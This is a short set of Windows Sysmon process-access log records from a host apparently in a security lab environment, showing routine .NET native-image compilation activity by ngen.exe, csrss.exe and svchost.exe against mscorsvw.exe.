{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7641,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:07.278\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1333-5F25-0000-00101FD20B00}\r\nTargetProcessId: 2548\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:07.278","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1333-5F25-0000-00101FD20B00}","TargetProcessId":"2548","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7642,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:07.278\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1333-5F25-0000-00101FD20B00}\r\nTargetProcessId: 2548\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:07.278","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1333-5F25-0000-00101FD20B00}","TargetProcessId":"2548","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7643,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:07.278\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1333-5F25-0000-00101FD20B00}\r\nTargetProcessId: 2548\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:07.278","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1333-5F25-0000-00101FD20B00}","TargetProcessId":"2548","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7644,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:07.418\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1333-5F25-0000-001067D60B00}\r\nTargetProcessId: 3956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:07.418","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1333-5F25-0000-001067D60B00}","TargetProcessId":"3956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7645,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:07.418\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1333-5F25-0000-001067D60B00}\r\nTargetProcessId: 3956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:07.418","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1333-5F25-0000-001067D60B00}","TargetProcessId":"3956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7646,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:07.434\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1333-5F25-0000-001067D60B00}\r\nTargetProcessId: 3956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:07.434","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1333-5F25-0000-001067D60B00}","TargetProcessId":"3956","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7647,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:07.481\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1333-5F25-0000-0010D0D90B00}\r\nTargetProcessId: 4140\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:07.481","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1333-5F25-0000-0010D0D90B00}","TargetProcessId":"4140","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7648,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:07.481\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1333-5F25-0000-0010D0D90B00}\r\nTargetProcessId: 4140\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:07.481","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1333-5F25-0000-0010D0D90B00}","TargetProcessId":"4140","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
